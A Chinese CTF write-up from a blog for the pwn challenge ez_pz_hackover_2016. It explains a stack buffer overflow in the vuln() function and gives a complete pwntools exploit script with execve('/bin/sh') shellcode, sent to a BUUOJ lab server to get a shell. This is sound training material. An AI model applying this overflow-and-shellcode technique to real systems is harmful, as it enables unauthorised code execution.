-
ez_pz_hackover_2016
ez_pz_hackover_2016
Arch: i386-32-little RELRO: Full RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x8048000) RWX: Has RWX segments- 1
- 2
- 3
- 4
- 5
- 6
32位,保护全关
int chall() { size_t v0; // eax int result; // eax char s[1024]; // [esp+Ch] [ebp-40Ch] BYREF _BYTE *v3; // [esp+40Ch] [ebp-Ch] printf("Yippie, lets crash: %p\n", s); printf("Whats your name?\n"); printf("> "); fgets(s, 1023, stdin); v0 = strlen(s); v3 = memchr(s, 10, v0); if ( v3 ) *v3 = 0; printf("\nWelcome %s!\n", s); result = strcmp(s, "crashme"); if ( !result ) return vuln((char)s, 0x400u); return result; }- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
这里不存在漏洞点
void *__cdecl vuln(char src, size_t n) { char dest[50]; // [esp+6h] [ebp-32h] BYREF return memcpy(dest, &src, n); }- 1
- 2
- 3
- 4
- 5
- 6
漏洞点在这里,通过上面输入的数据传进这里并执行栈
思路
我们需要计算不同函数栈的距离
需要绕过strcmp和memchr,
\x00均可绕过,答案就呼之欲出了,调好偏移,使返回地址指向shellcode就可以getshell了
from pwn import* from Yapack import * r,elf=rec("node4.buuoj.cn",27018,"./pwn",10) context(os='linux', arch='i386',log_level='debug') #debug('b *0x8048600') sc=b'\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80' leak=get_addr_int()-(0x1c) pl=b'crashme\x00'+b'a'*(0x12)+p64(leak)+sc sla(b'> ',pl) ia()- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
-
相关阅读:
【零基础入门MyBatis系列】第八篇——使用MyBatis的小技巧
【算法训练-二叉树 六】【路径和计算】路径总和I、路径总和II、路径总和III、二叉树的最大路径和
聚类算法的先验基础知识
Python如何采集关键词数据
DRU-Net--一种用于医学图像分割的高效深度卷积神经网络
面试题 01.09.字符串轮转
HTML标签---表格
【算法与数据结构】538、LeetCode把二叉搜索树转换为累加树
GoLang之channel数据结构及阻塞、非阻塞操作、多路select
Vue3使用ElementUI按需自动引入
- 原文地址:https://blog.csdn.net/qq_62887641/article/details/133149736
